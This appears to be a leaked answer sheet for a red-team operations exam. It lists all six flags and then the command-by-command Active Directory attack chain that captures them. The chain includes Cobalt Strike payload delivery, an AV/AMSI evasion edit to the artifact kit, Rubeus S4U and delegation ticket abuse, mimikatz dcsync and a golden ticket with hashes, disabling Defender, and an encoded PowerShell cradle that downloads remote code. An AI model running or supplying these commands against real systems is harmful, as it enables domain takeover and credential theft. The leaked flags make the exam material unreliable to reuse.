FLAG 1 - 7b5362c02c78f6b114e5cebd24eb2bf0

FLAG 2 - eb37d7b24ae6d4640558304db2b23099

FLAG 3- ec05148d3a2e0f3b044b4573cb84674e

FLAG 4- d302622334f652167456d17fa0596cff

FLAG 5- 9dfe6f3301f3a3f3660f21878e7b6d9f

FLAG 6- 9636a983e927a4fa950f58759cc34912

CONNECTING TO THE EXAM.

Cd /opt/cobaltstrike

1- ./teamserver <IP> Passw0rd!

CREATE LISTENER –
3 listeners

1- HTTP 80
2- SMB 445 -- FOR LATERAL MOVEMENT.
3- TCP_LOCAL 1337
Starting the first instance.

1- IN KALI ATTACKING MACHINE –

HOST YOUR MALICOUS PAYLOAD –

IN VICTIM MACHINE WINDOWS –

Download the payload .

iwr -uri http://10.10.100.135:8080/gethere.exe -outfile c:\users\consultant\gethere.exe

Run the following payload by

Cmd.exe /c .\gethere.exe

You will get your initial beacon on the cobalt

BYPASS AMSI USING ARTIFACT IN KALI
ls -l dist-pipe
ls -l src-common/

EDIT bypass-pipe.c

void start(HINSTANCE mhandle) {

/* switched from snprintf... as some A/V product was flagging based on the function *sigh*
*/
sprintf(pipename, "%c%c%c%c%c%c%c%c%cs<YOURNAME>-%d-<HERE>", 92, 92, 46,
92, 112, 105, 112, 101, 92, (int)(GetTickCount() % 9898));

/* start our server and our client */

CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&server_thread, (LPVOID)
NULL, 0, NULL);
client_thread(NULL);
}

open build.sh
ADD # infront of build_Artifcacts.

Run build.sh

TO CHECK IF ALL THE CHANGES ARE CORRECT OR NOT RUN A THREAT CHECK

ON WINDOWS ATTACKING MACHINE –

Visit – C:\Tools\Cobaltstrike\artifact-kit]dist-pipe
C:\Tools\ThreatCheck\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f
artifact64svcbig.exe

IT should say NO threat found !

FIRST FLAG –

cd C:/Program Files/Red Team Ops/

upload C:\Payloads\RTO.exe

run sc start rtoTestSvc

run netstat -anp tcp

If you see a port created by you in the listener 1337 .

Then you can interact with it –

connect localhost 1337

you will get a new beacon.

Svc_test *
Interact with svc-test

Run whoami

Run net localgroup administrators CHILD\consultant /add

Powerpick Get-Content C:\Users\Administrators\Desktop\flag1.txt

GET THE FLAG

Flag 2 –

Get the elevate system beacon from the last beacon by –

elevate svc-exe tcp-local

Now interact with the newly opened beacon

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe triage

COPY THE LUID of the svc_test

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe dump /luid:<YOUR
LUID> /service:krbtgt /nowrap

COPY THE HASH WHICH YOU GET

NOW INTERACT THE LOW PRIVILEGE CONSULTANT BEACON .

AND RUN S4U

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe s4u

/impersonateuser:c.boyd /msdsspn:cifs/srv.child.rto.local /user:svc_test /ticket: ....= /nowrap

PASTE TICKET VALUE WHICH U GET IN EARLIER STEP

YOU NEED TO COPY THE S4U2 PROXY REQUEST TICKET

AND ENCODE THE TICKET HASH VALUE

OPEN POWERSHELL IN WINDOWS ATTACKING MACHINE AND ENCODE THE TICKET

NOTE : USE S4U2PROXYFOR REQUEST TICKET TO ENCODE.

PS C:\Users\Administrator> [System.IO.File]::WriteAllBytes("C:\Payloads\srv.kirbi",
[System.Convert]::FromBase64String(" PASTE THE TICKET)

make_token CHILD\c.boyd FakePASS

beacon> kerberos_ticket_use C:\Payloads\srv.kirbi

beacon> run klist

beacon> ls \\srv.child.rto.local\c$

NOW ON THE SYSTEM BEACON RUN –

powerpick Get-Content \\srv.child.rto.local\c$\Users\Administrator\Desktop\flag2.txt
eb37d7b24ae6d4640558304db2b23099

FLAG 3. PATH UNCONSTRAINED DELEGATION

On the same beacon – (flag2 – path )

Impersonate user c.boyd

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe monitor

/targetuser:c.boyd /interval:10 /nowrap
NO COPY THE HASH GENERATED.

OPEN POWERSHELL IN WINDOWS ATTACKING MACHINE – RUN

PS C:\Users\Administrator> [System.IO.File]::WriteAllBytes("C:\Payloads\dc2.kirbi",
[System.Convert]::FromBase64String(" TICKET VALUE”)

beacon> make_token CHILD\c.boyd FakePass

beacon> kerberos_ticket_use C:\Payloads\dc2.kirbi

beacon> ls \\dc-2\c$\
beacon> jump psexec64 dc-2 smb

A NEW BEACON WILL GET SPAWNED –

CLICK DC-2 INTERACT –

beacon> powerpick Get-Content \\dc-2\c$\Users\Administrator\Desktop\flag3.txt

ec05148d3a2e0f3b044b4573cb84674e

GET FLAG
FLAG 3.TXT - ec05148d3a2e0f3b044b4573cb84674e

FLAG4 – GOLDEN TICKET ATTACK.

powershell Set-MpPreference -DisableRealTimeMonitoring $true

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

beacon> powerpick get-domainsid -domain rto.local

beacon> powerpick get-domainsid -domain child.rto.local

beacon> mimikatz lsadump::dcsync /all /csv

mimikatz kerberos::golden /user:administrator /domain:child.rto.local /sid:S-1-5-21-1886337448-
2504686659-850325809 /krbtgt:a7431956a5140b39e732fe1936605ae0 /sids:S-1-5-21-2323903455-
1895497758-3703895482-519 /ptt

beacon> ls \\dc-1.rto.local\c$\

beacon> jump psexec64 dc-1.rto.local smb

run net localgroup Administrators CHILD\consultant /add
beacon> run net localgroup administrators
beacon> powerpick Get-Content C:\Users\Administrator\Desktop\flag4.txt

FLAG4.TXT - d302622334f652167456d17fa0596cff
FLAG 5-

after initial connection

and adding our user to the admin group

beacon> jump psexec64 dc-1.rto.local smb

FOR STABLE CONNECTION IN DC1 -

INJECT NOTEPAD.EXE

beacon> execute notepad.exe

beacon> inject 3852 x64 tcp-local
mimikatz lsadump::dcsync /all /csv

beacon> mimikatz sekurlsa::pth /user:j.frazier /domain:rto.local

/ntlm:c13f49341f28a793171685becf613937 /run:"powershell -w hidden"
beacon> steal_token 2060

beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'whoami' -

RawResult

beacon> socks 9050

beacon> rportfwd 8080 10.10.100.135 80

beacon> rportfwd 4444 windows/beacon_reverse_tcp

beacon> run netsh advfirewall add rule name="Allow 4444" dir=in action=allow
protocol=TCP localport=4444

beacon> run netsh advfirewall firewall add rule name="Allow 4444" dir=in action=allow
protocol=TCP localport=4444
beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'powershell -w
hidden -enc
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlA
GIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4
AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMgAuADIAM
AA0ADoAOAAwADgAMAAvAHMAJwApACkA' -RawResult

beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'powershell Set-

MpPreference -DisableRealTimeMonitoring $true' -RawResult

beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'powershell -w

hidden -enc
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlA
GIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4
AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMgAuADIAM
AA0ADoAOAAwADgAMAAvAHMAJwApACkA' -RawResult

beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'powershell -w

hidden -enc
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlA
GIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4
AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMgAuADIAM
AA0ADoAOAAwADgAMAAvAHMAJwApACkA' -RawResult

beacon> run whoami

beacon> powerpick Get-Content C:\Users\Administrator\Desktop\flag5.txt

[*] Tasked beacon to run: Get-Content C:\Users\Administrator\Desktop\flag5.txt
(unmanaged)
[+] host called home, sent: 134767 bytes
[+] received output:
FLAG 5- 9dfe6f3301f3a3f3660f21878e7b6d9f

beacon> run netsh advfirewall firewall add rule name="Allow 8080" dir=in action=allow
protocol=TCP localport=8080

beacon> run netsh advfirewall firewall add rule name="Allow 4444" dir=in action=allow
protocol=TCP localport=4444

beacon> rportfwd 8080 10.10.100.135 80

FLAG 6-

beacon> powerpick mkdir C:/temp

beacon> upload C:\Payloads\NAME.EXE

beacon> execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p

C:\temp\NAME.exe

beacon> connect localhost 1337

beacon> powerpick Get-Content C:\Users\Administrator\Desktop\flag6.txt

flag 6 - 9636a983e927a4fa950f58759cc34912
in the powershell –

enter